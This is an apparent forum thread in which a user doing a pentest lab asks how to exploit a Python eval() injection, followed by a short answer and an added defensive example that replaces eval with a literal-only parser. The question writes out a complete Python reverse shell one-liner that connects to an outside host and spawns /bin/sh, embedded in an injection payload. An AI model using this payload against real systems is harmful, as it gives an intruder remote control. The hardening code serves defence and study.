I am working on a pentest lab. There is a Python eval() function I need to exploit.
It is like
eval('%s>1',payload)
I need to execute a Python reverse shell script as payload. It is
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I am trying like
eval('%s >1' "__import__('os').system('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'")
Not sure how to import all those modules and execute it.
Any help appreciated.
Try to include globals() and locals() in the eval (to import into the global scope). This is explained in "In Python, why doesn't an import in an exec in a function work?" Also see https://lucumr.pocoo.org/2011/2/1/exec-in-python/ chapter "Behind the Scenes of Imports".
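
Seen from the defender's side, the eval pattern in the question can be replaced with a parser that accepts only a numeric literal before comparing. This is an added example, not part of the original posts; it assumes the lab code formats the input as '%s>1' % payload, and the function names and sample inputs are constructed for illustration.

```python
import ast

MAX_LEN = 64  # assumed limit; bounds parser work on hostile input


def check_vulnerable(payload):
    # Assumed form of the pattern from the question: the caller's text is
    # pasted into Python source, so any expression in it gets evaluated.
    return eval('%s>1' % payload)


def parse_number(payload):
    """Return payload as an int or float, or raise ValueError."""
    if not isinstance(payload, str) or len(payload) > MAX_LEN:
        raise ValueError('input must be a short string')
    try:
        # literal_eval builds literals only; it never calls functions,
        # resolves names, or follows attribute access.
        value = ast.literal_eval(payload.strip())
    except (ValueError, SyntaxError, TypeError,
            MemoryError, RecursionError) as exc:
        raise ValueError('not a numeric literal') from exc
    # Exact type check: rejects bool, complex, str, list, tuple, dict.
    if type(value) not in (int, float):
        raise ValueError('not a numeric literal')
    return value


def check_hardened(payload):
    # Same comparison as the original, but on a parsed number.
    return parse_number(payload) > 1


def classify(samples):
    """Map each sample to True/False, or 'rejected' if it is not a number."""
    results = {}
    for sample in samples:
        try:
            results[sample] = check_hardened(sample)
        except ValueError:
            results[sample] = 'rejected'
    return results


if __name__ == '__main__':
    # Constructed sample inputs: two numbers and three non-numeric strings.
    demo = ['5', '0.5', "__import__('os').getcwd()", '[2]', 'True']
    for text, outcome in classify(demo).items():
        print('%-30s %s' % (text, outcome))
```

Rejected inputs can be logged as an indicator that someone is probing the endpoint for expression evaluation.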